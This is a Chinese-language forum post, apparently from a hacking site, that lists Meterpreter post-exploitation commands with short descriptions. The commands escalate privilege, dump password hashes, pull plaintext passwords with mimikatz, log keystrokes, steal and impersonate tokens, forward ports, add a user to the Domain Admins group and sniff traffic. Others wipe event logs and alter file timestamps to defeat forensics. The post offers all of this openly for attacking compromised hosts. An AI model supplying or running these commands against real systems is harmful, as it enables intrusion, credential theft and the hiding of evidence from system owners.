X黑手网
点击查看-X黑手网
点击查看-X黑手网

获取到 Meterpreter 之后的指令

msf解决中文乱码问题:输入 

chcp 65001(UTF-8) chcp 437(IBM437英语)
sysinfo
列出受控主机的系统信息

getuid
查看当前操控身份

ls 
列出目标主机的文件和文件夹信息

use priv
加载特权提升扩展模块,来扩展meterpreter库

ps
显示所有运行进程以及关联的用户账户

getsystem
通过各种攻击向量来提升到系统用户权限

shell
以所有可用令牌来运行一个交互的shell

screenshot
对目标主机的屏幕进行截图

upload file
向目标主机上传文件

download file
从目标主机下载文件

keyscan_dump
存储目标主机上或许的键盘记录

getprivs
尽可能多的获取目标主机上的特权

background
将你当前的meterpreter shell转为后台执行

help
打开帮助

run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名

migrate PID
迁移到一个指定的进程ID
hashdump
导出目标主机中的口令哈希值

load mimikatz
加载mimikatz模块

msv
ssp
tspkg
wdigest
获取登录密码的hash值

kerberos
获取明文密码

mimikatz_command -f samdump::hashes
另一种方式获取哈希值

mimikatz_command -f sekurlsa::searchPasswords
另一种方式获取明文密码
portfwd add -l 3389 -r 192.168.206.200 -p 3389
把被攻击机的3389端口流量,转发到本地的3389端口上
use incognito 
加载inconito功能(用来盗取目标主机的令牌或是假冒用户)

list_tokens -u
列出目标主机用户组的可用令牌

impersonate_token DOMAIN_NAME\\USERNAME
假冒目标主机上的可用令牌。

steal_token
盗窃给定进程的可用令牌并进行令牌假冒

drop_token
停止假冒当前的令牌
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。

execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。

execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。
add_user username password -h ip
在远程目标主机上添加一个用户

add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中

clearev
清除目标主机上的日志记录

timestomp
修改文件属性,例如修改文件的创建时间(反取证调差)

reboot
重启目标主机
rev2self 
回到控制目标主机的初始用户账户下。

reg command
在目标主机注册表中进行交互,创建,删除和查询等操作。

setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。

uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。
use sniffer
加载嗅探模块

sniffer_interfaces
列出目标主机所有开放的网络接口

sniffer_dump interfaceID pcapname
在目标主机上启动嗅探

sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探

sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据

sniffer_stop interfaceID
停止嗅探

 

请登录后发表评论

    没有回复内容